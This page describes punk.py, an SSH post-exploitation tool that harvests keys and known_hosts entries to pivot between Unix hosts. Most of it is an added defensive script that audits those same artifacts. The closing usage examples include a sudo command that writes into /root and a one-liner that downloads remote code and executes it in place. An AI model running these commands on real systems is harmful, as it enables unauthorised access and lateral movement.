Punk.Py - Unix SSH Post-Exploitation Tool
unix SSH post-exploitation 1337 tool
how it works
punk.py is a post-exploitation tool meant to assist network pivoting from a compromised Unix box. It collects usernames, SSH keys and known hosts from a Unix system, and then tries to connect via SSH to all the combinations found. punk.py is written to work on standard Python 2 and Python 3 installations.
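The three artifacts listed above (known_hosts entries, private keys, and the accounts that own them) are exactly what an administrator should audit on their own hosts to limit how far a pivot could reach. The script below is an added example written for this page, not part of punk.py: it parses a known_hosts file and reports host names that are stored in plaintext (hashing them with `ssh-keygen -H` is the mitigation), tells whether a private key in legacy PEM or OpenSSH format is protected by a passphrase, and checks that a key file's mode keeps it unreadable to other local users. All sample data (the known_hosts text, the PEM key, the `make_openssh_key` header builder) is constructed for the demonstration and contains no real key material.

```python
"""Audit the SSH artifacts a pivoting tool would harvest from a host.

Added example, not part of punk.py. Sample inputs are constructed.
"""
import base64
import stat
import struct
from typing import Dict, List

OPENSSH_MAGIC = b"openssh-key-v1\x00"

# Constructed known_hosts content: one plaintext entry (two aliases for the
# same host) and one entry already hashed by `ssh-keygen -H`.
SAMPLE_KNOWN_HOSTS = """\
# comment line
bastion.example.internal,10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYMATERIALFORDEMO0000000000000000
|1|FakeSaltBase64AAAAAAAAAAAAAA=|FakeHashBase64AAAAAAAAAAAAAA= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYMATERIALFORDEMO0000000000000000
"""

# Constructed legacy PEM key with the header OpenSSL adds when encrypting.
SAMPLE_LEGACY_ENCRYPTED = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""


def audit_known_hosts(text: str) -> Dict[str, object]:
    """Return host names stored in plaintext and the count of hashed entries."""
    plaintext: List[str] = []
    hashed = 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):        # @cert-authority / @revoked marker
            fields = fields[1:]
        if len(fields) < 3:                  # host, key type, key: not an entry
            continue
        hostfield = fields[0]
        if hostfield.startswith("|1|"):      # hashed form: |1|salt|hmac
            hashed += 1
        else:
            plaintext.extend(hostfield.split(","))
    return {"plaintext": plaintext, "hashed": hashed}


def private_key_is_encrypted(key_text: str) -> bool:
    """True if a legacy PEM or OpenSSH-format private key needs a passphrase.

    Legacy PEM keys carry a 'Proc-Type: 4,ENCRYPTED' header when encrypted.
    OpenSSH-format keys store the cipher name as the first length-prefixed
    string after the 'openssh-key-v1\\0' magic; the name 'none' means the
    key material is stored in the clear.
    """
    lines = [ln.strip() for ln in key_text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        raise ValueError("not a PEM-style private key")
    if "OPENSSH PRIVATE KEY" not in lines[0]:
        return any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines)
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("bad openssh-key-v1 magic")
    off = len(OPENSSH_MAGIC)
    (cipher_len,) = struct.unpack(">I", blob[off:off + 4])
    cipher = blob[off + 4:off + 4 + cipher_len]
    return cipher != b"none"


def make_openssh_key(ciphername: str) -> str:
    """Constructed minimal OpenSSH-format key header (no key material).

    Layout: magic, ciphername, kdfname, kdfoptions, number of keys (0).
    Real keys continue with public and encrypted private sections.
    """
    def ssh_string(s: bytes) -> bytes:
        return struct.pack(">I", len(s)) + s

    blob = (OPENSSH_MAGIC + ssh_string(ciphername.encode())
            + ssh_string(b"none") + ssh_string(b"") + struct.pack(">I", 0))
    body = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + body
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def key_mode_is_private(mode: int) -> bool:
    """True if a key file mode (e.g. from os.stat) grants no group/other access."""
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


if __name__ == "__main__":
    report = audit_known_hosts(SAMPLE_KNOWN_HOSTS)
    print("plaintext known_hosts targets:", report["plaintext"])
    print("hashed entries:", report["hashed"])
    print("legacy PEM encrypted:", private_key_is_encrypted(SAMPLE_LEGACY_ENCRYPTED))
    print("openssh 'none' encrypted:", private_key_is_encrypted(make_openssh_key("none")))
    print("mode 0600 private:", key_mode_is_private(0o100600))
```

On a real host, feed `audit_known_hosts` the contents of each user's `~/.ssh/known_hosts`, `private_key_is_encrypted` the text of each `id_*` file, and `key_mode_is_private` the `st_mode` from `os.stat` on those files; any plaintext host, unencrypted key, or group/world-readable key is one more hop a tool like this could take unattended.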
examples
standard execution:
$ ./punk.py
skip passwd checks and use a custom home path:
$ ./punk.py --no-passwd --home /home/ldapusers/
execute commands with sudo:
$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
one-liner fileless (with the --no-passwd parameter):
$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd
TODO
- improve private key hunting, including DSA keys
- Recursion
- SSH keys with password bruteforce
- Hashed known_hosts bruteforce (https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/)